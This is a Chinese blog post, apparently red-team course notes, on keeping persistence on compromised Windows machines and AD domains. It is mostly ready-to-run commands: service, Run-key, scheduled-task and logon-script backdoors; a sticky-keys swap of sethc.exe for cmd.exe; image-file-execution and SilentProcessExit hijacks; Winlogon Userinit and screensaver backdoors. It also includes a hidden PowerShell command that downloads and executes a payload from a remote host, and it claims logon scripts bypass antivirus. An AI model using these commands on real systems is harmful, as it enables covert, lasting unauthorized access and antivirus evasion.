EthanDoctor

内网对抗-权限维持篇&AD域&单机版&自启动五类&映像劫持&粘滞键&屏幕保护&Logon

Ethan医生2周前系统安全40

 权限维持-内网域&单机版-自启动手法

 权限维持-内网域&单机版-粘滞键后门

 权限维持-内网域&单机版-文件映像劫持

 权限维持-内网域&单机版-屏保&登录&脚本

#权限维持-域环境&单机版-自启动手法

基于服务器重启控制或时间(事件)触发后门执行保持权限维持

1、自启动路径加载(Administrator改成自己的电脑名称)

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

 

2、自启动服务加载(ServiceTest 任务名称)

sc create ServiceTest binPath= C:\xd.exe start= auto

sc delete ServiceTest

 

3、自启动注册表加载

-当前用户键值(HKCU)

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

-服务器键值(HKLM需要管理员权限)

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

-添加启动项(backdoor任务名称,容易被杀毒软件拦截)

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\xd.exe"

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\xd.exe"

 

4、计划计时任务

参考前面横向移动课程(任务名称RunXD)

schtasks /create /tn "RunXD" /tr "C:\xd.exe" /sc daily /st 12:50

查看任务

schtasks 


5、组策略

新建一个bat文件,这里bat内容为执行后门命令

使用gpedit.msc进入本地组策略,来到用户配置--》Windows设置--》脚本登录,点击浏览选择bat文件

 

#权限维持-域环境&单机版-粘滞键后门

系统自带的辅助功能进行替换执行,放大镜,旁白,屏幕键盘等均可。

利用条件:开放的远程终端连接服务(3389)

粘滞键位置:

c:\windows\system32\sethc.exe

修改权限:takeown /f C:\Windows\System32\sethc.exe

移动备份:move sethc.exe sethc1.exe

替换劫持:copy cmd.exe sethc.exe

 

#权限维持-域环境&单机版-文件映像劫持

测试:执行notepad成cmd或后门

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe /c calc"

配合GlobalFlag隐藏:执行正常关闭后触发

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\1\xd.exe"

 

#权限维持-域环境&单机版-屏保&登录&脚本

1、WinLogon配合无文件落地上线

切换用户登录或远程终端登录触发:

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\Windows\system32\userinit.exe,C:\1\xd.exe,"

 

2、屏幕保护生效后执行后门

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\2\xd.exe" /f

 

3、Logon Scripts登录脚本后门

Windows用户登录时触发,Logon Scripts能够优先于杀毒软件执行,绕过杀毒

reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_SZ /d "C:\2\xd.exe"

reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_SZ /d "powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.139.141:80/a'))"

"

 

4、文件是落地的,实战中采用无文件落地上线,更加隐藏

例子:powershell无文件命令上线



标签: 权限维持
返回列表

上一篇:内网对抗-权限维持篇&内网AD域&Kerberos点&黄金票据&白银票据&钻石票据&蓝宝石票据

下一篇:JAVA攻防-FastJson专题&各版本Gadget链&autoType开关&黑名单&依赖包&本地代码

相关文章

内网对抗-权限维持篇&Linux系统&SSH协议&OpenSSH&PAM后门&软连接&密钥&后门账户

➢ 权限维持-Linux-SSH协议替换版本-OpenSSH后门➢ 权限维持-Linux-SSH协议更改验证-PAM启用替换➢ 权限维持-Linux-SSH协议登录方式-...

内网对抗-权限维持篇&AD域&单机版&C2远控&Rookit后门&RustDesk&GotoHTTP&直连

➢ 权限维持-内网域&单机版-GotoHttp➢ 权限维持-内网域&单机版-RustDesk➢ 权限维持-内网域&单机版-r77Rookit1、C...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号